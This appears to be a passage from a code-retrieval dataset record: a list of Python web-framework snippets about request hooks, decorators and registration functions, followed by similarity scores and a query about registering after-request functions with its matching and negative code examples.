mock_as_view(view, request, *args, **kwargs):\n view.request = request\n view.args = args\n view.kwargs = kwargs\n return view", "def some(func):\n def wrapper(* args,** kwargs):\n logging.basicConfig(filename='error.log',level=logging.DEBUG)\n logging.info(request.url + \" : \" + str(request.remote_addr)+\" using function \"+func.__name__ )\n return func(* args,** kwargs)\n\n wrapper.__name__ = func.__name__ \n return wrapper", "def wsgiapp():\n def decorator(func):\n def wsgiapp_wrapper(*args):\n # we get 3 args when this is a method, two when it is\n # a function :(\n if len(args) == 3:\n environ = args[1]\n start_response = args[2]\n args = [args[0]]\n else:\n environ, start_response = args\n args = []\n def application(environ, start_response):\n form = request.parse_formvars(environ,\n include_get_vars=True)\n status = '200 OK'\n form['environ'] = environ\n try:\n res = func(*args, **form.mixed())\n except ValueError, ve:\n status = '500 Server Error'\n res = '<html>There was an error: %s</html>' % \\\n html_quote(ve)\n start_response(status, [('content-type', 'text/html')])\n return [res]\n app = simplecatcher(application)\n return app(environ, start_response)\n wsgiapp_wrapper.exposed = True\n return wsgiapp_wrapper\n return decorator", "def __call__(self, key):\n\n def wrapper(func):\n self._registry[key] = func\n\n return wrapper", "def RegisterModel(model_name):\n\n def decorator(f):\n MODEL_REGISTRY[model_name] = f\n return f\n\n return decorator", "def require_registered(function):\n\n @wraps(function)\n def wrap(request, *args, **kwargs):\n decorated_view_func = login_required(request)\n if not decorated_view_func.user.is_authenticated:\n return decorated_view_func(request) # return redirect to login\n\n if request.user.password_disposition != User.FULL:\n return redirect('set-password')\n else:\n return function(request, *args, **kwargs)\n\n return wrap", "def require_add(next=None, internal=None, on_install=None):\n def decorator(view):\n def newview(request, *args, **kwargs):\n next = newview.next\n internal = newview.internal\n\n try:\n fb = request.facebook\n except:\n raise ImproperlyConfigured('Make sure you have the Facebook middleware installed.')\n\n if internal is None:\n internal = request.facebook.internal\n\n if callable(next):\n next = next(request.path)\n elif isinstance(next, int):\n next = '/'.join(request.path.split('/')[next + 1:])\n elif next is None and fb.callback_path and request.path.startswith(fb.callback_path):\n next = request.path[len(fb.callback_path):]\n else:\n next = ''\n\n if not fb.check_session(request):\n if fb.added:\n if request.method == 'GET' and fb.app_name:\n return fb.redirect('%s%s' % (fb.get_app_url(), next))\n return fb.redirect(fb.get_login_url(next=next))\n else:\n return fb.redirect(fb.get_add_url(next=next))\n\n if not fb.added:\n return fb.redirect(fb.get_add_url(next=next))\n\n if 'installed' in request.GET and callable(on_install):\n on_install(request)\n\n if internal and request.method == 'GET' and fb.app_name:\n return fb.redirect('%s%s' % (fb.get_app_url(), next))\n\n return view(request, *args, **kwargs)\n newview.next = next\n newview.internal = internal\n return newview\n return decorator", "def documents_required(function=None):\n def _dec(view_func):\n def _view(request, *args, **kwargs):\n _user = request.user\n\n if _user.is_authenticated() and _user.is_worker() and\\\n (not _user.is_application_form_filled):\n return redirect('/profissional/subscription/', permanent=True)\n else:\n return view_func(request, *args, **kwargs)\n\n _view.__name__ = view_func.__name__\n _view.__dict__ = view_func.__dict__\n _view.__doc__ = view_func.__doc__\n\n return _view\n\n if function is None:\n print(\"Funciont is none\")\n return _dec\n else:\n print(\"There is some value for function\")\n return _dec(function)", "def test_register_view(dummy_request):\n from .views.default import register_view\n result = register_view(dummy_request)\n assert result == {}", "def route_params(params_def):\n def decorator(fn): # pylint: disable=missing-docstring\n meta = RouteMeta.load(fn)\n meta.route_params = params_def\n meta.save()\n return fn\n\n return decorator", "def rendered(func):\n @wraps(func)\n def render_function(request, *args, **kwargs):\n response = func(request, *args, **kwargs)\n if isinstance(response, HttpResponse) or isinstance(response,\n HttpResponseRedirect):\n return response\n template_name, items = response\n return render_to_response(template_name, items,\n context_instance=RequestContext(request))\n return render_function", "def anonymous_required(function=None):\n def _dec(view_func):\n def _view(request, *args, **kwargs):\n if request.user.is_authenticated():\n return redirect(reverse('core:home'))\n else:\n return view_func(request, *args, **kwargs)\n\n return _view\n\n if function is None:\n return _dec\n else:\n return _dec(function)", "def view_function(*args, **kwargs):\n\n res = {}\n status = 200\n\n try:\n from apis import apis\n url_rule = request.url_rule.rule\n apis_keys = [a[1:] for a in apis.keys()]\n url_rule_splitted = [a for a in url_rule.split(\"/\") if a in apis_keys]\n blueprint = url_rule_splitted[-1]\n blueprint = \"/\" + blueprint\n\n controller_function = apis[blueprint].functions[url_rule]\n res, status = controller_function(args, kwargs, request=request)\n\n except Exception as exc:\n # TODO: log error\n print(exc)\n\n res['error'] = True\n status = 400\n\n return res, status", "def register(self, py_type, visitor=None):\n if visitor:\n self[py_type] = visitor\n else:\n\n def decorator(f):\n self[py_type] = f\n return f\n\n return decorator", "def register(self, alias, method, *args, **kargs):\n pfunc = functools.partial(method, *args, **kargs)\n pfunc.__name__ = alias\n pfunc.__doc__ = method.__doc__\n \n try:\n # Some methods don't have any dictionary, in these cases simply \n # don't copy it.\n pfunc.__dict__.update(method.__dict__.copy())\n except AttributeError:\n pass\n \n setattr(self, alias, pfunc)", "def __call__(self, path):\n def wrapper(application):\n self.register(path, application)\n return application\n return wrapper", "def route(self, pattern: str) -> Callable:\n\n def warpper(view: Callable) -> Callable:\n self.add_route(pattern, view)\n return view\n\n return warpper", "def my_view(cls):\n return cls.__my_view", "def createViews(views):\n ...", "def decorated(*args, **kwargs):\n\n token = None\n\n if 'x-access-token' in request.headers:\n token = request.headers['x-access-token']\n\n if token is None:\n return make_response(jsonify({\n \"message\" : \"Please sign-up and login\"}), 401)\n\n try:\n data = jwt.decode(token, Config.SECRET)\n driver = data['is_driver']\n except:\n return make_response(jsonify({\n \"message\" : \"kindly provide a valid token in the header\"}), 401)\n\n if not driver:\n return make_response(jsonify({\n \"message\" : \"you are not authorized to perform this function as a non-driver user\"}), 401)\n\n return f(*args, **kwargs)", "def require_visitor(func):\n\n @wraps(func)\n def decorator(*args, **kwargs):\n if g.user:\n return redirect(url_for('site.home'))\n return func(*args, **kwargs)\n\n return decorator", "def methdispatch(func): \n dispatcher = singledispatch(func)\n def wrapper(*args, **kw):\n return dispatcher.dispatch(args[1].__class__)(*args, **kw)\n wrapper.register = dispatcher.register\n update_wrapper(wrapper, func)\n return wrapper", "def register(self):\n REGISTERED_FUNCTIONS[self.path] = self", "def register_class_views(state):\n try:\n prefixes = state.app.request_prefixes\n except AttributeError:\n prefixes = []\n state.app.request_prefixes = prefixes\n prefixes.append(state.url_prefix if state.url_prefix is not None else '')\n # Personal list\n personal_view = PersonalRequests.as_view('personal_requests')\n state.add_url_rule('/personal/', view_func=personal_view)\n state.add_url_rule('/personal/rss.xml', view_func=personal_view)\n state.add_url_rule('/personal/<path:filters>', view_func=personal_view)\n # Payout list\n payout_view = PayoutListing.as_view('list_approved_requests')\n payout_url_stub = '/pay/'\n state.add_url_rule(payout_url_stub, view_func=payout_view)\n state.add_url_rule(payout_url_stub + 'rss.xml', view_func=payout_view)\n state.add_url_rule(payout_url_stub + '<path:filters>',\n view_func=payout_view)\n # Other more generalized listings\n register_perm_request_listing(state, 'list_pending_requests',\n '/pending/', (PermissionType.review, PermissionType.audit),\n ActionType.pending, u'Pending Requests')\n register_perm_request_listing(state, 'list_completed_requests',\n '/completed/', PermissionType.elevated, ActionType.finalized,\n u'Completed Requests')\n # Special all listing, mainly intended for API users\n register_perm_request_listing(state, 'list_all_requests',\n '/all/', PermissionType.elevated, ActionType.statuses,\n u'All Requests')", "def register_name(self, func_name, *args):\n\n if not func_name:\n raise ValueError(\"Specified an empty function name\")\n\n # Called as a decorator with no signature arguments so decorator needs\n # to use function annotations\n if len(args) == 0:\n return self._make_decorator(func_name)\n\n # If the last element is a valid @-syntax return value then we have a\n # decorator with signature arguments.\n if TypeCastSignature.is_return_element(args[-1]):\n return self._make_decorator(func_name, *args)\n\n # If we get here the function must have been called as a normal function\n # (not a decorator) so the last element must be the function to wrap.\n if not callable(args[-1]):\n raise ValueError(\n (\"Failed to register @-syntax function as {} is not \" \"callable\").format(args[-1])\n )\n if len(args) == 1:\n return self._make_decorator(func_name)(args[0])\n else:\n sigargs = args[:-1]\n return self._make_decorator(func_name, *sigargs)(args[-1])", "def captive(f):\n\n def wrapper(self, request, *args, **kwargs):\n return captiveHandler(request) or f(self, request, *args, **kwargs)\n functools.update_wrapper(wrapper, f)\n return wrapper" ]
[ "0.7289756", "0.72566867", "0.7225575", "0.69957423", "0.6992379", "0.6944056", "0.690279", "0.68110013", "0.6685898", "0.659799", "0.64419633", "0.63916886", "0.63874936", "0.63675", "0.63599527", "0.63099504", "0.6304241", "0.62933576", "0.6256121", "0.6230036", "0.62196887", "0.6204815", "0.6196604", "0.61964613", "0.6181614", "0.6169627", "0.6158729", "0.6155529", "0.6126706", "0.6109469", "0.6054973", "0.60283697", "0.60141116", "0.6014019", "0.59787786", "0.5978534", "0.59718865", "0.59660244", "0.59659815", "0.5937459", "0.5915626", "0.5911862", "0.5849204", "0.5845305", "0.58437264", "0.5821993", "0.58218336", "0.58135116", "0.58031577", "0.58022475", "0.57901216", "0.57895404", "0.5787686", "0.57856053", "0.57832086", "0.5769144", "0.57630765", "0.57599556", "0.57580143", "0.5754415", "0.57519954", "0.57432884", "0.57378143", "0.57325685", "0.5731623", "0.57250905", "0.57220674", "0.57091063", "0.56953347", "0.5692353", "0.568764", "0.56874657", "0.56860715", "0.56813973", "0.5677955", "0.56693405", "0.56616473", "0.5660284", "0.5649965", "0.56489635", "0.56279474", "0.5626645", "0.5625374", "0.5623574", "0.562333", "0.56229526", "0.5616883", "0.56095445", "0.5601529", "0.5601329", "0.5601051", "0.55897915", "0.5589126", "0.5585774", "0.5585304", "0.5580443", "0.5576505", "0.557609", "0.55701375", "0.5562794" ]
0.6250833
19
Registers a function to run before each request.
def before_request(self, f): self.before_request_funcs.append(f) return f
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def before_request(self, func: typing.Callable):\n return self.add_hook(type_=\"pre\", hook=func)", "def before_request(self, f):\n self.before_request_handlers.append(f)\n return f", "def before_worker_start(func):\n _func_only(func)\n worker_methods_db.register_before_start(func)\n return func", "def before_request():\n pass", "def configure_before_request_funcs(app):\n @app.before_request\n def conf_set_user_cookie_id():\n return set_user_cookie_id()\n \n @app.before_request\n def check_for_maintenance():\n if config.DOWN_FOR_MAINTENANCE:\n return 'Sorry, we\\'re down momentarily for a teensey bit of maintenance!', 503\n \n @app.before_request\n def count_uniques():\n return\n statsd.set('unique_users', g.user_cookie_id)\n statsd.set('unique_ips', request.remote_addr)\n \n @app.before_request\n def set_statsd_context():\n g.statsd_context = \"%s.%s\" % (request.endpoint, request.method)\n g.total_request_timer = statsd.timer(g.statsd_context + \".response_time\")\n g.total_request_timer.start()", "def hook_client_before_request(self, event):\r\n for functor in self._hooks['client_before_request']:\r\n functor(event)", "def request_filter(self, fn):\n self.request_filters.append(fn)\n return fn", "def register_before_first(app):\n app.before_first_request_funcs.append(\n partial(admin.utils.create_root_user, app))\n app.before_first_request_funcs.append(\n partial(admin.utils.load_messenger_config, app))\n app.before_first_request_funcs.append(\n partial(admin.utils.load_site_config, app))", "def hook_server_before_exec(self, request_event):\r\n\r\n for functor in self._hooks['server_before_exec']:\r\n functor(request_event)", "def before_call(self, func: Callable[..., Any], *args: Any, **kwargs: Any) -> None:", "def process_before_request_hooks(self):\n\n hooks = []\n\n if self.resource:\n hooks.extend(self.resource.api.before_all_hooks)\n hooks.extend(self.resource.before_all_hooks)\n\n hooks.extend(self.before_all_hooks)\n hooks.extend(\n getattr(\n self,\n 'before_{method}_hooks'.format(method=self.meth),\n []\n )\n )\n\n for hook in chain(hooks):\n hook(self)", "async def _pre_call(self, _request_id: int, request: fastapi.Request, *args, **kwargs) -> None:\n return", "def register_method_before(fn, phase): # type: (Callable, str) -> None\n PackageMixinsMeta._methods_to_be_added[fn.__name__] = fn\n PackageMixinsMeta._add_method_before[phase].append(fn)", "def after_request(self, f):\n self.after_request_funcs.append(f)\n return f", "def before(self, before: Route.Decorator):\n pass", "def before_test(self, func, *args, **kwargs):\n pass", "def register_ajax_handler(self, request, function):\n if request in self.ajax_handlers:\n L.error(\"Error: request:\" + request + \" is already registered\")\n return False\n self.ajax_handlers[request] = function\n L.info(\"registered:\"+request)\n return True", "def before_request():\r\n\r\n\tinit_classes()", "def after_request_handle(self, func):\n self.after_request.append(func)\n return func", "def get_request(func):\r\n func.request = True\r\n return func", "def global_request_interceptor(self):\n # type: () -> Callable\n def wrapper(process_func):\n if not callable(process_func):\n raise SkillBuilderException(\n \"Global Request Interceptor process_func input parameter \"\n \"should be callable\")\n\n class_attributes = {\n \"process\": lambda self, handler_input: process_func(\n handler_input)\n }\n\n request_interceptor = type(\n \"RequestInterceptor{}\".format(\n process_func.__name__.title().replace(\"_\", \"\")),\n (AbstractRequestInterceptor,), class_attributes)\n\n self.add_global_request_interceptor(\n request_interceptor=request_interceptor())\n return process_func\n return wrapper", "def register_request_hydrator(self):\n\n # pylint: disable=missing-return-doc, missing-return-type-doc\n def decorator(func):\n self.request_hydrator_func = func\n return func\n\n return decorator", "def threaded_callback(self, func):\n\n self.th_func_map[func.__name__] = func", "def register(self):\n REGISTERED_FUNCTIONS[self.path] = self", "def bofore_response_handle(self, func):\n self.before_response.append(func)\n return func", "def after_request(self, f):\n self.after_request_handlers.append(f)\n return f", "def after_request(self, f):\n self.after_request_handlers.append(f)\n return f", "def register_request_hooks(app):\n\n @app.before_request\n def before_request():\n g.db = open_db()\n\n @app.teardown_request\n def after_request(exc):\n g.db.__exit__(type(exc), exc, None)", "def pre_runroute_callable(self, route, request):\n return None", "def api_request_globals(f):\n @wraps(f)\n def inner(*args, **kwargs):\n request.is_api_request = True\n return f(*args, **kwargs)\n return inner", "def after_request(self, func: typing.Callable):\n return self.add_hook(type_=\"post\", hook=func)", "def callWhenInitialized(func):\n if _api:\n func()\n else:\n _initCallbacks.append(func)", "def register_pre_exec_callback(action_logger):\n logging.debug(\"Adding %s to pre execution callback\", action_logger)\n __pre_exec_callbacks.append(action_logger)", "def subscribe(self, requestName: str, function: RequestFunction):\n if requestName in self.requests:\n raise KeyError(f\"Cannot subscribe function {function} to name {requestName} because \"\n f\"the name is already used\")\n self.requests[requestName] = function", "def register():\n PLUGINS = dict()\n def decorator(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n value = func(*args, **kwargs)\n PLUGINS[func.__name__] = func\n return value\n return wrapper\n return decorator", "def before_call(\n self, cb: CircuitBreaker, func: Callable[..., T], *args: Any, **kwargs: Any\n ) -> None:", "def register(self, funcs):\n for name, func in funcs.items():\n self.functions[name] = func", "def dajaxice_register(*dargs, **dkwargs):\r\n\r\n if len(dargs) and not dkwargs:\r\n function = dargs[0]\r\n dajaxice_functions.register(function)\r\n return function\r\n\r\n def decorator(function):\r\n @functools.wraps(function)\r\n def wrapper(request, *args, **kwargs):\r\n return function(request, *args, **kwargs)\r\n dajaxice_functions.register(function, *dargs, **dkwargs)\r\n return wrapper\r\n return decorator", "def on_pre_execution(**kwargs):\n logging.debug(\"Calling callbacks: %s\", __pre_exec_callbacks)\n for callback in __pre_exec_callbacks:\n try:\n callback(**kwargs)\n except Exception:\n logging.exception(\"Failed on pre-execution callback using %s\", callback)", "def onRegister(setup_state):\n\tblueprint = setup_state.blueprint\n\t#if setup_state.options.get('auth') == True:\n\tif setup_state.url_prefix.startswith('/ext/'): #not really used right now\n\t\t#inside here, 'route' works but not 'before_request'\n\t\t#maybe use to register authentication-specific routes?\n\t\tprint(\"Authenticated API on {}\".format(setup_state.url_prefix))", "def defer_lowering(self, key, lower_fn):\n with self._lock:\n if key in self._no_defer:\n # Key is marked as no defer, register lowering now\n lower_fn()\n else:\n # Defer\n self._deferred[key].append(lower_fn)", "def preprocess_func(cls, func):\n pass", "def before(hook_name, methods, kwargs):\n for hookimpl in methods:\n self._plugin2calls[hookimpl.plugin].add(hook_name)", "def after_worker_start(func):\n _func_only(func)\n worker_methods_db.register_after_start(func)\n return func", "def _pre_dispatch(self, request, *args, **kwargs):\n pass", "def register(func):\n PLUGINS[func.__name__] = func\n return func", "def add_preprocess_callback(self, name, func, *args, **kwargs):\n\n self.preprocess[name] = (func, args, kwargs)", "def register_function(self, function, name=None):\n if name is None:\n name = function.__name__\n self.funcs[name] = function", "def preprocess_func(cls, func):\n return func", "def add_function(self, function):\n self.functions.append(function)", "def add_function(self, function):\n self.functions.append(function)", "def addFunction(self, func):\n self.__functions.append(func)", "def rpc_immediate(func):\n decorator = rpc_call(func)\n decorator.rpc_immediate = True\n return decorator", "def includeme(config):\n config.add_subscriber(add_renderer_globals, BeforeRender)\n config.add_subscriber(add_localizer, NewRequest)\n config.add_subscriber(add_csrf_validation, NewRequest)\n config.add_subscriber(add_resources, NewRequest)", "def register(name, func):\n WebSocketRouter.funcmap[name] = func", "def before_request():\n request._prometheus_metrics_request_start_time = time.time()", "def init_func(fn):\n fn.__has_run__ = False\n @functools.wraps(fn)\n def wrapper_fn(*args, **kwargs):\n if fn.__has_run__:\n cui.message('Warning: executing init_func %s more than once.' % fn)\n\n result = fn(*args, **kwargs)\n fn.__has_run__ = True\n return result\n\n Core.__init_functions__.append(wrapper_fn)\n return wrapper_fn", "def on_start(self):\n\n def decorator(coro):\n self._hooks.append((\"start\", coro))\n return coro\n\n return decorator", "def before_request():\n request._prometheus_metrics_request_start_time = default_timer()", "def inject_header(f):\n def oncall(*args, **kwargs):\n rv = f(*args, **kwargs)\n if rv.status_code == 200:\n rv.headers['X-Pingback'] = url_for('services/pingback',\n _external=True)\n return rv\n oncall.__name__ = f.__name__\n oncall.__module__ = f.__module__\n oncall.__doc__ = f.__doc__\n return oncall", "def register_callback(self, func):\n self.callback = func", "def rpc_deferred(func):\n decorator = rpc_call(func)\n decorator.rpc_deferred = True\n return decorator", "def notifyPreInsertion(self, function, **kwargs):\n self._sig_preinsertion.subscribe(function, **kwargs)", "def register_step(step_function: StepFunction) -> None:\n global _step_function\n _step_function = step_function", "def on_loaded(self, func):\n self._on_loaded_funcs.append(func)", "def enable_audit_logging(f):\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n def create_audit_log_for_request_decorator(response):\n return create_audit_log_for_request(response)\n\n if is_audit_enabled():\n # we can't add the `after_this_request` and\n # `create_audit_log_for_request_decorator` decorators to the\n # functions directly, because `is_audit_enabled` depends on\n # the config being loaded\n flask.after_this_request(create_audit_log_for_request_decorator)\n return f(*args, **kwargs)\n\n return wrapper", "def inner(func):\r\n\r\n service = func.__qualname__.split(\".\")[0]\r\n _Router().add_route(\r\n service=service,\r\n grpc_method=func.__name__,\r\n url_path=url,\r\n http_method=method\r\n )\r\n if pre_request is not None and len(pre_request) > 0:\r\n _MiddlewareManager().add_route_pre_middleware(pre_request, url)\r\n if pos_request is not None and len(pos_request) > 0:\r\n _MiddlewareManager().add_route_pre_middleware(pos_request, url)\r\n return func", "def register(func):\n plugins[func.__name__] = func\n return func", "def register_function(self, function, name=None):\n if name:\n self[name] = function\n else:\n self[function.__name__] = function", "def register(self, function, name=None, method='POST'):\r\n\r\n method = self.clean_method(method)\r\n\r\n # Generate a default name\r\n if not name:\r\n module = ''.join(str(function.__module__).rsplit('.ajax', 1))\r\n name = '.'.join((module, function.__name__))\r\n\r\n if ':' in name:\r\n log.error('Ivalid function name %s.' % name)\r\n return\r\n\r\n # Check for already registered functions\r\n if name in self._registry:\r\n log.error('%s was already registered.' % name)\r\n return\r\n\r\n # Create the dajaxice function.\r\n function = DajaxiceFunction(function=function,\r\n name=name,\r\n method=method)\r\n\r\n # Register this new ajax function\r\n self._registry[name] = function", "def onRequestStart(self, api, request):\n logging.info('Request start ({})'.format(request))", "def do_before(self):\r\n pass", "def add_hook(self, type_: str, hook: typing.Callable) -> typing.Callable:\n if type_ not in self._request_hooks:\n self._request_hooks[type_] = []\n\n self._request_hooks[type_].append(hook)\n return hook", "def pre_runroute_callable(self, route, request):\n\n #request.logevent(EInfo(\"pre_runroute_callable Request URL: {0} from {1}.\".format(request.get_full_path(), request.get_remote_addr())))\n # ATTN: test, let's trigger a signal\n if (False):\n id = 'signal.site.pre_runroute'\n message = {'route':route}\n source = None\n flag_collectresults = True\n signalresults = self.comp('signalmanager').broadcast(id, message, request, source, flag_collectresults)\n return None", "def getFunctionBefore(self, function: ghidra.program.model.listing.Function) -> ghidra.program.model.listing.Function:\n ...", "def register_requests(fn):\n @wraps(fn)\n def inner(self, *args, **kwargs):\n if not self._was_setup_called:\n self.dm_setup()\n\n response = self._get_response(args, kwargs)\n response_id = self._get_response_id(response)\n response.meta['__id'] = response_id\n\n result = fn(self, *args, **kwargs)\n if not result:\n return\n\n # Save original type to return the same results from ``fn``\n original_type = type(result)\n\n if isinstance(result, Request):\n result = [result]\n\n request_list = []\n for r in result:\n if isinstance(r, Request):\n r = self._add_identifiers_to_request(r, response_id)\n self._increase_counter(response)\n\n request_list.append(r)\n\n if original_type in (list, types.GeneratorType):\n return request_list\n else:\n return request_list[0]\n\n return inner", "def register(self, filter_name, filter_func):\n self._filters[filter_name] = filter_func", "def add_function (self, module, name) :\n setattr (module, name, self._wrapped (module, name))", "def wrap_before(before, condition=lambda *args, **kwargs: True):\n def decorator(func):\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n if condition(*args, **kwargs):\n before()\n return func(*args, **kwargs)\n return wrapped\n return decorator", "def post_init_func(fn):\n fn.__has_run__ = False\n @functools.wraps(fn)\n def wrapper_fn(*args, **kwargs):\n if fn.__has_run__:\n cui.message('Warning: executing post_init_func %s more than once.' % fn)\n\n result = fn(*args, **kwargs)\n fn.__has_run__ = True\n return result\n\n Core.__post_init_functions__.append(wrapper_fn)\n return wrapper_fn", "def add_hook(self, event, function):\n if event not in self.hooks:\n self.hooks[event] = []\n self.hooks[event].append(function)", "def on_before_execution(self):\n pass", "def register_compat_handler(self, func, version):\n tf_op.register_handler(func, version, self.names, self.domain, self.kwargs)", "def set_function(self, function, guard):\r\n self.function = function\r\n self.guard = guard", "def process_request_starts(self, request):\n pass", "def register_side_effect(label: str, func: Callable) -> None:\n if func in _registry[label]:\n return\n _registry.add(label, func)", "def before(self, context):\n raise NotImplementedError", "def register(name, fn=None):\n def _hook_add(func):\n if name not in _hooks:\n logger.debug(\"Creating new hook %s\" % name)\n _hooks[name] = []\n\n logger.debug('Registering hook %s for function %s' % (name, fn))\n _hooks[name].append(func)\n\n if fn is None:\n # Behave like a decorator\n def decorator(func):\n _hook_add(func)\n return func\n return decorator\n else:\n # Behave like a function, just register hook\n _hook_add(fn)", "def decorate(func):\n from aha.dispatch.router import get_router\n r = get_router()\n r.connect(None, path, controller = func, **params)\n return func", "def register(self):\n # self.register_route(\"GET\", self.__route, lambda req, res: self.status(req, res))\n self.register_route(\"GET\", self.__route, None, self.status)", "def enqueue(self, func):\n self.queue.put(func)", "def hook(callback):\n hooks.append(callback)", "def require_thread():\n def add_attribute(func):\n if not hasattr(func, \"require_thread\"):\n func.require_thread = True\n return func\n return add_attribute", "def register_side_effect(label, func):\n if func in _registry[label]:\n return\n _registry.add(label, func)", "def on_lz_registered(self, func):\n self._set_event_handler(\"lz\")\n self._events.on_lz_registered(func)", "def before_invoke(self, coro):\n if not asyncio.iscoroutinefunction(coro):\n raise TypeError('The pre-invoke hook must be a coroutine.')\n\n self._before_invoke = coro\n return coro", "def run_before(self):\n\n for path in self.hooks.get('before', []):\n self.run_module(path)", "def hook(self, name):\r\n def wrapper(func):\r\n self.hooks.add(name, func)\r\n return func\r\n return wrapper", "def required(self, f):\n self.storage.protected_routes.add(f)\n return f", "def add_setup(setup=None, teardown=None):\n def decorate_function(test):\n def wrapper(self):\n if setup:\n setup(self)\n test(self)\n if teardown:\n teardown(self)\n return wrapper\n return decorate_function" ]
[ "0.8118946", "0.7769813", "0.69504994", "0.67644304", "0.6689539", "0.65856653", "0.65145713", "0.64500964", "0.6426918", "0.6376406", "0.6375528", "0.63239646", "0.6193873", "0.6136782", "0.59849536", "0.5943737", "0.58747", "0.5869897", "0.5857567", "0.58538926", "0.5827149", "0.5812418", "0.5764284", "0.57346094", "0.56955945", "0.5689887", "0.5689887", "0.56871367", "0.5681491", "0.56393886", "0.5630879", "0.5606987", "0.5598525", "0.5582452", "0.5580899", "0.5568795", "0.55475056", "0.5545752", "0.5533788", "0.55304956", "0.55259424", "0.5525647", "0.55176395", "0.54891765", "0.54871273", "0.5474354", "0.5464785", "0.54279727", "0.542249", "0.54162854", "0.54162854", "0.5413079", "0.53874", "0.5375212", "0.5352849", "0.53461033", "0.53450376", "0.53423715", "0.5341481", "0.5331866", "0.53313977", "0.5321571", "0.53215396", "0.5309453", "0.5307446", "0.52655625", "0.5265226", "0.5260859", "0.5259816", "0.52433056", "0.5241257", "0.5234663", "0.52261424", "0.52149427", "0.52112114", "0.52050775", "0.5200987", "0.51938635", "0.51818615", "0.5179914", "0.51508653", "0.51451015", "0.5141118", "0.51362705", "0.5133384", "0.5130427", "0.51262325", "0.5117145", "0.5114524", "0.51108015", "0.5108582", "0.51010007", "0.5099876", "0.50956213", "0.50785774", "0.5070053", "0.50683755", "0.50679797", "0.50671554", "0.5062091" ]
0.81964976
0
Register a function to be run after each request.
def after_request(self, f): self.after_request_funcs.append(f) return f
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def after_request_handle(self, func):\n self.after_request.append(func)\n return func", "def after_request(self, f):\n self.after_request_handlers.append(f)\n return f", "def after_request(self, f):\n self.after_request_handlers.append(f)\n return f", "def after_request(self, func: typing.Callable):\n return self.add_hook(type_=\"post\", hook=func)", "def after_worker_start(func):\n _func_only(func)\n worker_methods_db.register_after_start(func)\n return func", "def before_request(self, f):\n self.before_request_funcs.append(f)\n return f", "def middleware_after(self):\n pass", "def after_error_request(self, f):\n self.after_error_request_handlers.append(f)\n return f", "def register_method_after(fn, phase): # type: (Callable, str) -> None\n PackageMixinsMeta._methods_to_be_added[fn.__name__] = fn\n PackageMixinsMeta._add_method_after[phase].append(fn)", "def post(self):\n self.finish(self.register())", "def bofore_response_handle(self, func):\n self.before_response.append(func)\n return func", "def register(self):\n REGISTERED_FUNCTIONS[self.path] = self", "def register_ajax_handler(self, request, function):\n if request in self.ajax_handlers:\n L.error(\"Error: request:\" + request + \" is already registered\")\n return False\n self.ajax_handlers[request] = function\n L.info(\"registered:\"+request)\n return True", "def before_request(self, f):\n self.before_request_handlers.append(f)\n return f", "def threaded_callback(self, func):\n\n self.th_func_map[func.__name__] = func", "def addHandler(self, fn):\n self.handlers.append(fn)", "def Postcall(function_to_call_later): \n def postcall_inside(fun): \n @functools.wraps(fun)\n def relay(*args, **kwargs):\n return function_to_call_later(fun(*args, **kwargs))\n return relay\n return postcall_inside", "def register_callback(self, func):\n self.callback = func", "def after_test(self, func, *args, **kwargs):\n pass", "def register(name, func):\n WebSocketRouter.funcmap[name] = func", "def register(self):\n # self.register_route(\"GET\", self.__route, lambda req, res: self.status(req, res))\n self.register_route(\"GET\", self.__route, None, self.status)", "def register(self, funcs):\n for name, func in funcs.items():\n self.functions[name] = func", "def onfinish( request ):", "def onfinish( request ):", "def process_after_request_hooks(self, resp):\n\n hooks = []\n meth_hooks = getattr(\n self,\n 'after_{method}_hooks'.format(method=self.meth),\n []\n )\n\n hooks.extend(meth_hooks)\n hooks.extend(self.after_all_hooks)\n\n if self.resource:\n hooks.extend(self.resource.after_all_hooks)\n hooks.extend(self.resource.api.after_all_hooks)\n\n for hook in chain(hooks):\n resp = hook(self, resp)\n\n return resp", "def after(self, after: Route.Decorator):\n pass", "def before_request(self, func: typing.Callable):\n return self.add_hook(type_=\"pre\", hook=func)", "def addFunction(self, func):\n self.__functions.append(func)", "def onRegister(self):\n pass", "def onRegister(self):\n pass", "def request_filter(self, fn):\n self.request_filters.append(fn)\n return fn", "def hook_server_after_exec(self, request_event, reply_event):\r\n for functor in self._hooks['server_after_exec']:\r\n functor(request_event, reply_event)", "def register_request_hooks(app):\n\n @app.before_request\n def before_request():\n g.db = open_db()\n\n @app.teardown_request\n def after_request(exc):\n g.db.__exit__(type(exc), exc, None)", "def register(self, callback):\n self.callback = callback", "def register(self, callback, func = None):\n if self.conduit is None:\n self.conduit = RPCConnection(self.host, self.port)\n self.conduit.comm(dict(command = 'app-key', key = self.rpckey))\n self.events = deque()\n self.responses = deque()\n self.errors = deque()\n self.callbacks = defaultdict(set)\n self.receiver(start = True)\n if callback in self.callbacks:\n self.callbacks[callback].add(func)\n return\n # Accessing here just initializes an empty set. This prevents\n # multiple redundant calls from re-sending the callback-add, which\n # RPM reports an error to because the callback is already defined.\n if func is not None:\n self.callbacks[callback].add(func)\n else:\n self.callbacks[callback]\n self.conduit.send(dict(command = 'callback-add', callback = callback))", "def post_event(self, func, *args, **kwargs):\n if not callable(func):\n assert(len(func) == 5)\n self._events.append(func + (log.get_tb(1), time.time()))\n else:\n self._events.append((func, args, kwargs, None, 0, log.get_tb(), time.time()))", "def after(self, func):\n return ConditionedFuture(func, self)", "def on_lz_registered(self, func):\n self._set_event_handler(\"lz\")\n self._events.on_lz_registered(func)", "def on_completion(self):\n\n def decorator(coro):\n self._hooks.append((\"completion\", coro))\n return coro\n\n return decorator", "def add_function(self, function):\n self.functions.append(function)", "def add_function(self, function):\n self.functions.append(function)", "def subscribe(self, requestName: str, function: RequestFunction):\n if requestName in self.requests:\n raise KeyError(f\"Cannot subscribe function {function} to name {requestName} because \"\n f\"the name is already used\")\n self.requests[requestName] = function", "def dajaxice_register(*dargs, **dkwargs):\r\n\r\n if len(dargs) and not dkwargs:\r\n function = dargs[0]\r\n dajaxice_functions.register(function)\r\n return function\r\n\r\n def decorator(function):\r\n @functools.wraps(function)\r\n def wrapper(request, *args, **kwargs):\r\n return function(request, *args, **kwargs)\r\n 